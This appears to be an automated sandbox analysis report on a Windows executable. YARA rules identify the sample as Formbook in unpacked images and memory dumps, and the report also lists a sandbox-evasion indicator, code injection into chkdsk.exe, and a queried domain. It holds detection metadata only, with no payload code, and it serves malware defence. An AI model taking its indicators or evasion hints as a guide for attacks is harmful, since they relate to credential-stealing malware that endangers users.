Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://parking.bodiscdn.com
Source: chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: unknown | DNS traffic detected: queries for: www.experiencedlawfirms.com

E-Banking Fraud

Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: GV8EJooYMIgEnEk.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 0_2_0275E6D8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 0_2_0275C294
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 0_2_0275E6C8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 0_2_07160234
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 0_2_071692D0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 0_2_0716003F
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 0_2_07160040
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_0041B8C3
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_0041C0CD
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_0041C8EE
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_0041C8F8
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00408C7F
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_0041C435
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00408C80
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_0041CF03
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00402FB0
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E4D466
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04D9841F
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E525DD
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04D9D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DB2581
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E51D55
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E52D07
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04D80D20
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E52EF7
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DA6E30
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E4D616
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E51FF1
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E528EC
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04D9B090
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E520A8
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E41002
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04D8F900
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E522AE
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E4DBD2
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DBEBB0
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04E52B28
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04A98C80
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04A98C7F
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04A92D90
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04A92FB0
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04AACF03
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04AAC8EE
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04AAC8F8
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 04D8B150 appears 35 times
